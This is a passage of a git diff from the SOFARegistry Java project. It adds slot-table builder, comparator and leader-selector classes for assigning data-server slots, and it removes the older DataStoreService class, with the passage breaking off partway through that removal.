file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util.builder; + +/** + * @author chen.zhu + *

Jan 12, 2021 + */ +public interface Builder { + T build(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/builder/SlotBuilder.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/builder/SlotBuilder.java new file mode 100644 index 000000000..143e7a32d --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/builder/SlotBuilder.java @@ -0,0 +1,151 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util.builder; + +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.collect.Sets; +import java.util.Collection; +import java.util.Collections; +import java.util.Set; +import org.apache.commons.lang.StringUtils; + +/** + * @author chen.zhu + *

Jan 12, 2021 + */ +public class SlotBuilder implements Builder { + + private final int slotId; + + private final int followerNums; + + private String leader; + + private final Set followers = Sets.newHashSet(); + + private long epoch; + + public SlotBuilder(int slotId, int followerNums) { + this.slotId = slotId; + this.followerNums = followerNums; + } + + public SlotBuilder(int slotId, int followerNums, String leader, long epoch) { + this.slotId = slotId; + this.followerNums = followerNums; + this.leader = leader; + this.epoch = epoch; + } + + public SlotBuilder setLeader(String leader) { + if (!StringUtils.equals(this.leader, leader)) { + this.leader = leader; + epoch = DatumVersionUtil.nextId(); + } + return this; + } + + public boolean addFollower(String follower) { + if (StringUtils.isBlank(follower)) { + throw new IllegalArgumentException("add empty follower"); + } + if (followers.contains(follower)) { + return true; + } + if (followers.size() >= followerNums) { + return false; + } + followers.add(follower); + return true; + } + + public boolean addFollower(Collection followerCollection) { + for (String follower : followerCollection) { + if (!addFollower(follower)) { + return false; + } + } + return true; + } + + public boolean removeFollower(String follower) { + return followers.remove(follower); + } + + public int getFollowerSize() { + return followers.size(); + } + + public boolean containsFollower(String follower) { + return followers.contains(follower); + } + + private boolean isReady() { + return leader != null; + } + + public String getLeader() { + return leader; + } + + public int getSlotId() { + return slotId; + } + + public Set getFollowers() { + return Collections.unmodifiableSet(Sets.newHashSet(followers)); + } + + public long getEpoch() { + return epoch; + } + + @Override + public Slot build() { + if (!isReady()) { + throw new SofaRegistryRuntimeException( + "slot builder is not ready for build: leader[" + + leader + + "], followers[" + + StringUtils.join(followers, ",") + + "]"); + } + if (epoch <= 0) { + this.epoch = DatumVersionUtil.nextId(); + } + return new Slot(slotId, leader, epoch, followers); + } + + @Override + public String toString() { + return "SlotBuilder{" + + "slotId=" + + slotId + + ", followerNums=" + + followerNums + + ", leader='" + + leader + + '\'' + + ", followers=" + + followers + + ", epoch=" + + epoch + + '}'; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/builder/SlotTableBuilder.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/builder/SlotTableBuilder.java new file mode 100644 index 000000000..4e2aff15c --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/builder/SlotTableBuilder.java @@ -0,0 +1,280 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util.builder; + +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.slot.util.MigrateSlotGroup; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.alipay.sofa.registry.util.JsonUtils; +import com.fasterxml.jackson.core.JsonProcessingException; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.stream.Collectors; +import org.apache.commons.lang.StringUtils; + +/** + * @author chen.zhu + *

Jan 12, 2021 + */ +public class SlotTableBuilder implements Builder { + + private static final Logger logger = LoggerFactory.getLogger(SlotTableBuilder.class); + + private final Map buildingSlots = Maps.newHashMapWithExpectedSize(256); + + private final Map reverseMap = Maps.newHashMap(); + + private final int slotNums; + + private final int followerNums; + + private long epoch; + + private final SlotTable initSlotTable; + + public SlotTableBuilder(SlotTable initSlotTable, int slotNums, int slotReplicas) { + this.slotNums = slotNums; + this.followerNums = slotReplicas - 1; + this.initSlotTable = initSlotTable; + } + + public SlotBuilder getOrCreate(int slotId) { + return buildingSlots.computeIfAbsent(slotId, k -> new SlotBuilder(slotId, followerNums)); + } + + public void init(List dataServers) { + for (int slotId = 0; slotId < slotNums; slotId++) { + Slot slot = initSlotTable == null ? null : initSlotTable.getSlot(slotId); + if (slot == null) { + getOrCreate(slotId); + continue; + } + SlotBuilder slotBuilder = + new SlotBuilder(slotId, followerNums, slot.getLeader(), slot.getLeaderEpoch()); + if (!slotBuilder.addFollower(initSlotTable.getSlot(slotId).getFollowers())) { + throw new IllegalArgumentException(String.format("to many followers, %s", slotBuilder)); + } + buildingSlots.put(slotId, slotBuilder); + } + initReverseMap(dataServers); + } + + private void initReverseMap(List dataServers) { + for (int slotId = 0; slotId < slotNums; slotId++) { + SlotBuilder slotBuilder = getOrCreate(slotId); + String leader = slotBuilder.getLeader(); + if (leader != null) { + DataNodeSlot dataNodeSlot = + reverseMap.computeIfAbsent(leader, k -> new DataNodeSlot(leader)); + dataNodeSlot.addLeader(slotId); + } + Set followers = slotBuilder.getFollowers(); + for (String follower : followers) { + DataNodeSlot dataNodeSlot = + reverseMap.computeIfAbsent(follower, k -> new DataNodeSlot(follower)); + dataNodeSlot.addFollower(slotId); + } + } + dataServers.forEach( + dataServer -> reverseMap.putIfAbsent(dataServer, new DataNodeSlot(dataServer))); + } + + public String replaceLeader(int slotId, String nextLeader) { + SlotBuilder slotBuilder = getOrCreate(slotId); + String prevLeader = slotBuilder.getLeader(); + slotBuilder.setLeader(nextLeader).removeFollower(nextLeader); + DataNodeSlot nextLeaderDataNodeSlot = + reverseMap.computeIfAbsent(nextLeader, k -> new DataNodeSlot(nextLeader)); + nextLeaderDataNodeSlot.addLeader(slotId); + nextLeaderDataNodeSlot.removeFollower(slotId); + if (!StringUtils.isEmpty(prevLeader)) { + reverseMap.get(prevLeader).removeLeader(slotId); + } + return prevLeader; + } + + public SlotTableBuilder removeFollower(int slotId, String follower) { + SlotBuilder slotBuilder = getOrCreate(slotId); + if (slotBuilder.removeFollower(follower)) { + reverseMap.get(follower).removeFollower(slotId); + } + return this; + } + + public SlotTableBuilder addFollower(int slotId, String follower) { + SlotBuilder slotBuilder = getOrCreate(slotId); + if (!slotBuilder.addFollower(follower)) { + throw new IllegalArgumentException(String.format("to many followers, %s", slotBuilder)); + } + DataNodeSlot dataNodeSlot = + reverseMap.computeIfAbsent(follower, k -> new DataNodeSlot(follower)); + dataNodeSlot.addFollower(slotId); + return this; + } + + public List getDataServersOwnsFollower(int followerSlot) { + SlotBuilder slotBuilder = getOrCreate(followerSlot); + return Lists.newArrayList(slotBuilder.getFollowers()); + } + + public String getDataServersOwnsLeader(int leaderSlot) { + SlotBuilder slotBuilder = getOrCreate(leaderSlot); + return slotBuilder.getLeader(); + } + + public boolean hasNoAssignedSlots() { + if (buildingSlots.size() < slotNums) { + return true; + } + for (SlotBuilder slotBuilder : buildingSlots.values()) { + if (StringUtils.isEmpty(slotBuilder.getLeader())) { + return true; + } + if (slotBuilder.getFollowerSize() < followerNums) { + return true; + } + } + return false; + } + + public void removeDataServerSlots(String dataServer) { + for (SlotBuilder slotBuilder : buildingSlots.values()) { + if (slotBuilder.removeFollower(dataServer)) { + logger.info( + "[removeDataServerSlots] slot [{}] remove follower data-server[{}]", + slotBuilder.getSlotId(), + dataServer); + } + if (dataServer.equals(slotBuilder.getLeader())) { + logger.info( + "[removeDataServerSlots] slot [{}] remove leader data-server[{}]", + slotBuilder.getSlotId(), + dataServer); + slotBuilder.setLeader(null); + } + } + reverseMap.remove(dataServer); + } + + public MigrateSlotGroup getNoAssignedSlots() { + MigrateSlotGroup migrateSlotGroup = new MigrateSlotGroup(); + for (int slotId = 0; slotId < slotNums; slotId++) { + SlotBuilder slotBuilder = getOrCreate(slotId); + if (StringUtils.isEmpty(slotBuilder.getLeader())) { + migrateSlotGroup.addLeader(slotId); + } + int lackFollowerNums = followerNums - slotBuilder.getFollowers().size(); + if (lackFollowerNums > 0) { + migrateSlotGroup.addFollower(slotId, lackFollowerNums); + } + } + return migrateSlotGroup; + } + + public List getDataNodeSlotsLeaderBeyond(int num) { + return reverseMap.values().stream() + .filter( + dataNodeSlot -> { + return dataNodeSlot.getLeaders().size() > num; + }) + .collect(Collectors.toList()); + } + + public List getDataNodeSlotsLeaderBelow(int num) { + return reverseMap.values().stream() + .filter( + dataNodeSlot -> { + return dataNodeSlot.getLeaders().size() < num; + }) + .collect(Collectors.toList()); + } + + public List getDataNodeSlotsFollowerBeyond(int num) { + return reverseMap.values().stream() + .filter( + dataNodeSlot -> { + return dataNodeSlot.getFollowers().size() > num; + }) + .collect(Collectors.toList()); + } + + public List getDataNodeSlotsFollowerBelow(int num) { + return reverseMap.values().stream() + .filter( + dataNodeSlot -> { + return dataNodeSlot.getFollowers().size() < num; + }) + .collect(Collectors.toList()); + } + + public void incrEpoch() { + this.epoch = DatumVersionUtil.nextId(); + } + + @Override + public SlotTable build() { + Map stableSlots = Maps.newHashMap(); + buildingSlots.forEach( + (slotId, slotBuilder) -> { + stableSlots.put(slotId, slotBuilder.build()); + epoch = Math.max(epoch, stableSlots.get(slotId).getLeaderEpoch()); + }); + return new SlotTable(epoch, stableSlots.values()); + } + + public DataNodeSlot getDataNodeSlot(String dataServer) { + DataNodeSlot dataNodeSlot = getDataNodeSlotIfPresent(dataServer); + if (dataNodeSlot == null) { + throw new IllegalArgumentException("no DataNodeSlot for " + dataServer); + } + return dataNodeSlot; + } + + public DataNodeSlot getDataNodeSlotIfPresent(String dataServer) { + return reverseMap.get(dataServer); + } + + @Override + public String toString() { + try { + return JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(this); + } catch (JsonProcessingException e) { + return ""; + } + } + + public SlotTable getInitSlotTable() { + return initSlotTable; + } + + public int getSlotNums() { + return slotNums; + } + + public int getSlotReplicas() { + return followerNums + 1; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/comparator/Comparators.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/comparator/Comparators.java new file mode 100644 index 000000000..4c732c5b6 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/comparator/Comparators.java @@ -0,0 +1,169 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util.comparator; + +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import java.util.Collection; +import java.util.Collections; +import java.util.Comparator; + +/** + * @author chen.zhu + *

Jan 27, 2021 + */ +public class Comparators { + + public static DataServerFollowerSizeComparator mostFollowersFirst( + SlotTableBuilder slotTableBuilder) { + return new DataServerFollowerSizeComparator(slotTableBuilder, SortType.DES); + } + + public static DataServerFollowerSizeComparator leastFollowersFirst( + SlotTableBuilder slotTableBuilder) { + return new DataServerFollowerSizeComparator(slotTableBuilder, SortType.ASC); + } + + public static DataServerLeaderSizeComparator mostLeadersFirst(SlotTableBuilder slotTableBuilder) { + return new DataServerLeaderSizeComparator(slotTableBuilder, SortType.DES); + } + + public static DataServerLeaderSizeComparator leastLeadersFirst( + SlotTableBuilder slotTableBuilder) { + return new DataServerLeaderSizeComparator(slotTableBuilder, SortType.ASC); + } + + public static SlotLeaderRelateDataServerLeaderSizeComparator slotLeaderHasMostLeaderSlots( + SlotTableBuilder slotTableBuilder) { + return new SlotLeaderRelateDataServerLeaderSizeComparator(slotTableBuilder, SortType.DES); + } + + public abstract static class AbstractSlotComparator implements Comparator { + + protected SlotTableBuilder slotTableBuilder; + + protected SortType sortType; + + public AbstractSlotComparator(SlotTableBuilder slotTableBuilder, SortType sortType) { + this.slotTableBuilder = slotTableBuilder; + this.sortType = sortType; + } + } + + /** + * ---------------------------------- Data Server Comparators + * -------------------------------------------- + */ + public abstract static class AbstractDataServerComparator extends AbstractSlotComparator { + + public AbstractDataServerComparator(SlotTableBuilder slotTableBuilder, SortType sortType) { + super(slotTableBuilder, sortType); + } + + @Override + public int compare(String dataServer1, String dataServer2) { + DataNodeSlot dataNodeSlot1 = slotTableBuilder.getDataNodeSlot(dataServer1); + DataNodeSlot dataNodeSlot2 = slotTableBuilder.getDataNodeSlot(dataServer2); + int score = + getFirstClassMember(dataNodeSlot1).size() - getFirstClassMember(dataNodeSlot2).size(); + if (score == 0) { + score = getEconomyMember(dataNodeSlot1).size() - getEconomyMember(dataNodeSlot2).size(); + } + return sortType.getScore(score); + } + + protected Collection getFirstClassMember(DataNodeSlot dataNodeSlot) { + return Collections.emptyList(); + } + + protected Collection getEconomyMember(DataNodeSlot dataNodeSlot) { + return Collections.emptyList(); + }; + } + + public static class DataServerFollowerSizeComparator extends AbstractDataServerComparator { + + public DataServerFollowerSizeComparator(SlotTableBuilder slotTableBuilder, SortType sortType) { + super(slotTableBuilder, sortType); + } + + @Override + protected Collection getFirstClassMember(DataNodeSlot dataNodeSlot) { + return dataNodeSlot.getFollowers(); + } + + @Override + protected Collection getEconomyMember(DataNodeSlot dataNodeSlot) { + return dataNodeSlot.getLeaders(); + } + } + + public static class DataServerLeaderSizeComparator extends AbstractDataServerComparator { + + public DataServerLeaderSizeComparator(SlotTableBuilder slotTableBuilder, SortType sortType) { + super(slotTableBuilder, sortType); + } + + @Override + protected Collection getFirstClassMember(DataNodeSlot dataNodeSlot) { + return dataNodeSlot.getLeaders(); + } + + @Override + protected Collection getEconomyMember(DataNodeSlot dataNodeSlot) { + return dataNodeSlot.getFollowers(); + } + } + + /** + * ---------------------------------- Slot Comparators + * -------------------------------------------- + */ + public abstract static class AbstractSlotNumberComparator + extends AbstractSlotComparator { + + public AbstractSlotNumberComparator(SlotTableBuilder slotTableBuilder, SortType sortType) { + super(slotTableBuilder, sortType); + } + + @Override + public int compare(Integer slotId1, Integer slotId2) { + String dataServer1 = slotTableBuilder.getOrCreate(slotId1).getLeader(); + String dataServer2 = slotTableBuilder.getOrCreate(slotId2).getLeader(); + return getDataServerComparator().compare(dataServer1, dataServer2); + } + + protected abstract AbstractDataServerComparator getDataServerComparator(); + } + + public static class SlotLeaderRelateDataServerLeaderSizeComparator + extends AbstractSlotNumberComparator { + + private final AbstractDataServerComparator dataServerComparator; + + public SlotLeaderRelateDataServerLeaderSizeComparator( + SlotTableBuilder slotTableBuilder, SortType sortType) { + super(slotTableBuilder, sortType); + dataServerComparator = new DataServerLeaderSizeComparator(slotTableBuilder, sortType); + } + + @Override + protected AbstractDataServerComparator getDataServerComparator() { + return dataServerComparator; + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/comparator/SortType.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/comparator/SortType.java new file mode 100644 index 000000000..2f9ef3242 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/comparator/SortType.java @@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util.comparator; + +/** + * @author chen.zhu + *

Jan 18, 2021 + */ +public enum SortType { + ASC { + @Override + public int getScore(int score) { + return score; + } + }, + DES { + @Override + public int getScore(int score) { + return -score; + } + }; + + public abstract int getScore(int score); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/selector/Selector.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/selector/Selector.java new file mode 100644 index 000000000..aa8b5f26a --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/selector/Selector.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util.selector; + +import java.util.Collection; + +/** + * @author chen.zhu + *

Jan 15, 2021 + */ +public interface Selector { + + T select(Collection candidates); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/selector/Selectors.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/selector/Selectors.java new file mode 100644 index 000000000..a50f3bfcd --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/selector/Selectors.java @@ -0,0 +1,110 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util.selector; + +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.server.meta.slot.util.comparator.Comparators; +import com.google.common.collect.Lists; +import java.util.Collection; +import java.util.List; +import java.util.Set; + +/** + * @author chen.zhu + *

Jan 27, 2021 + */ +public class Selectors { + + public static Selector slotLeaderSelector( + int highWaterMark, SlotTableBuilder slotTableBuilder, int slotId) { + return new DefaultSlotLeaderSelector(highWaterMark, slotTableBuilder, slotId); + } + + abstract static class AbstractSlotTableBuilderAwareSelector implements Selector { + + protected final SlotTableBuilder slotTableBuilder; + + public AbstractSlotTableBuilderAwareSelector(SlotTableBuilder slotTableBuilder) { + this.slotTableBuilder = slotTableBuilder; + } + } + + abstract static class AbstractDataServerSelector + extends AbstractSlotTableBuilderAwareSelector { + + public AbstractDataServerSelector(SlotTableBuilder slotTableBuilder) { + super(slotTableBuilder); + } + + @Override + public String select(Collection candidates) { + List sortedCandidates = Lists.newArrayList(candidates); + sortedCandidates.sort(getDataServerComparator()); + return sortedCandidates.isEmpty() ? null : sortedCandidates.get(0); + } + + protected abstract Comparators.AbstractDataServerComparator getDataServerComparator(); + } + + static class LeastLeaderFirstSelector extends AbstractDataServerSelector { + + private final Comparators.AbstractDataServerComparator comparator; + + public LeastLeaderFirstSelector(SlotTableBuilder slotTableBuilder) { + super(slotTableBuilder); + this.comparator = Comparators.leastLeadersFirst(slotTableBuilder); + } + + @Override + protected Comparators.AbstractDataServerComparator getDataServerComparator() { + return comparator; + } + } + + static class DefaultSlotLeaderSelector implements Selector { + + private final SlotTableBuilder slotTableBuilder; + private final int highWaterMark; + private final int slotId; + + public DefaultSlotLeaderSelector( + int highWaterMark, SlotTableBuilder slotTableBuilder, int slotId) { + this.highWaterMark = highWaterMark; + this.slotTableBuilder = slotTableBuilder; + this.slotId = slotId; + } + + @Override + public String select(Collection candidates) { + Set currentFollowers = slotTableBuilder.getOrCreate(slotId).getFollowers(); + Collection followerCandidates = Lists.newArrayList(candidates); + followerCandidates.retainAll(currentFollowers); + // first, try to select the candidate which is the follower + String leader = new LeastLeaderFirstSelector(slotTableBuilder).select(followerCandidates); + if (leader != null) { + // check the num of leaders + DataNodeSlot dataNodeSlot = slotTableBuilder.getDataNodeSlot(leader); + if (dataNodeSlot.getLeaders().size() < highWaterMark) { + return leader; + } + } + // second, find other candidate + return new LeastLeaderFirstSelector(slotTableBuilder).select(candidates); + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/DataStoreService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/DataStoreService.java deleted file mode 100644 index ff324ff19..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/store/DataStoreService.java +++ /dev/null @@ -1,598 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.store; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.DataOperator; -import com.alipay.sofa.registry.common.model.metaserver.GetChangeListRequest; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.ServiceFactory; -import com.alipay.sofa.registry.server.meta.node.MetaNodeService; -import com.alipay.sofa.registry.server.meta.node.NodeOperator; -import com.alipay.sofa.registry.server.meta.repository.NodeConfirmStatusService; -import com.alipay.sofa.registry.server.meta.repository.NodeRepository; -import com.alipay.sofa.registry.server.meta.repository.RepositoryService; -import com.alipay.sofa.registry.server.meta.task.Constant; -import com.alipay.sofa.registry.store.api.annotation.RaftReference; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.atomic.AtomicLong; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; -import java.util.stream.Collectors; - -/** - * - * @author shangyu.wh - * @version $Id: DataStoreService.java, v 0.1 2018-01-23 11:42 shangyu.wh Exp $ - */ -public class DataStoreService implements StoreService { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DataStoreService.class); - - private static final Logger TASK_LOGGER = LoggerFactory - .getLogger( - DataStoreService.class, - "[Task]"); - private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - private final Lock read = readWriteLock - .readLock(); - private final Lock write = readWriteLock - .writeLock(); - @Autowired - private NodeConfig nodeConfig; - - @Autowired - private TaskListenerManager taskListenerManager; - - @RaftReference(uniqueId = "dataServer") - private RepositoryService> dataRepositoryService; - - @RaftReference(uniqueId = "dataServer") - private NodeConfirmStatusService dataConfirmStatusService; - - private AtomicLong localDataCenterInitVersion = new AtomicLong( - -1L); - - private static final long COMPARE_TIME_COST = 1000L; - - @Override - public NodeType getNodeType() { - return NodeType.DATA; - } - - @Override - public NodeChangeResult setNodes(List nodes) { - throw new UnsupportedOperationException(); - } - - @Override - public NodeChangeResult addNode(DataNode dataNode) { - NodeChangeResult nodeChangeResult; - - String ipAddress = dataNode.getNodeUrl().getIpAddress(); - - long startAll = System.currentTimeMillis(); - write.lock(); - try { - - dataRepositoryService.put(ipAddress, new RenewDecorate(dataNode, - RenewDecorate.DEFAULT_DURATION_SECS)); - - reNew(dataNode, 30); - - nodeChangeResult = getNodeChangeResult(); - - dataConfirmStatusService.putConfirmNode(dataNode, DataOperator.ADD); - - } finally { - write.unlock(); - } - long cost = System.currentTimeMillis() - startAll; - if (cost >= COMPARE_TIME_COST) { - LOGGER.info("dataRepositoryService.addNode cost:{} ", cost); - } - return nodeChangeResult; - } - - @Override - public boolean removeNode(String ipAddress) { - - write.lock(); - try { - - RenewDecorate dataNode = dataRepositoryService.remove(ipAddress); - if (dataNode != null) { - - dataConfirmStatusService.putConfirmNode(dataNode.getRenewal(), DataOperator.REMOVE); - - LOGGER.info("Remove single node {} success!", dataNode.getRenewal()); - return true; - } - return false; - } finally { - write.unlock(); - } - } - - @Override - public void removeNodes(Collection nodes) { - write.lock(); - try { - if (nodes != null && !nodes.isEmpty()) { - for (DataNode dataNode : nodes) { - - String ipAddress = dataNode.getNodeUrl().getIpAddress(); - RenewDecorate dataNodeRemove = dataRepositoryService - .remove(ipAddress); - if (dataNodeRemove != null) { - - dataConfirmStatusService.putConfirmNode(dataNode, DataOperator.REMOVE); - - LOGGER.info("Remove node {} success!", dataNodeRemove.getRenewal()); - } - } - } - } finally { - write.unlock(); - } - } - - @Override - public void reNew(DataNode dataNode, int duration) { - - long startAll = System.currentTimeMillis(); - write.lock(); - try { - String ipAddress = dataNode.getNodeUrl().getIpAddress(); - RenewDecorate reNewer = dataRepositoryService.get(ipAddress); - - if (reNewer == null) { - LOGGER.warn("Renew Data node with ipAddress:" + ipAddress - + " has not existed!It will be registered again!"); - addNode(dataNode); - } else { - if (duration > 0) { - dataRepositoryService.replace(ipAddress, new RenewDecorate(dataNode, duration)); - } else { - dataRepositoryService.replace(ipAddress, new RenewDecorate(dataNode, - RenewDecorate.DEFAULT_DURATION_SECS)); - } - - } - long cost = System.currentTimeMillis() - startAll; - if (cost >= COMPARE_TIME_COST) { - LOGGER.info("dataRepositoryService.renew.all cost:{} ", cost); - } - } finally { - write.unlock(); - } - } - - /** - * only get local datacenter's dataNode, don't care other datacenter's dataNodes - * @return - */ - @Override - public Collection getExpired() { - Collection reNewerList = new ArrayList<>(); - read.lock(); - try { - Map> dataMap = dataRepositoryService.getAllData(); - - dataMap.forEach((ip, dataNode) -> { - - String dataCenter = dataNode.getRenewal().getDataCenter(); - if (dataCenter.equals(nodeConfig.getLocalDataCenter())) { - if (dataNode.isExpired()) { - reNewerList.add(dataNode.getRenewal()); - } - } - }); - - } finally { - read.unlock(); - } - return reNewerList; - } - - @Override - public Map getNodes() { - Map> map = getRunTime(); - Map ret = new HashMap<>(); - if (map != null && !map.isEmpty()) { - map.forEach((dataCenter, dataNodes) -> ret.putAll(dataNodes)); - } - return ret; - } - - @Override - public NodeChangeResult getNodeChangeResult() { - - NodeChangeResult nodeChangeResult = new NodeChangeResult(NodeType.DATA); - read.lock(); - try { - String localDataCenter = nodeConfig.getLocalDataCenter(); - - Map dataNodeRepositoryMap = dataRepositoryService - .getNodeRepositories(); - - ConcurrentHashMap> pushNodes = new ConcurrentHashMap<>(); - - Map versionMap = new ConcurrentHashMap<>(); - - 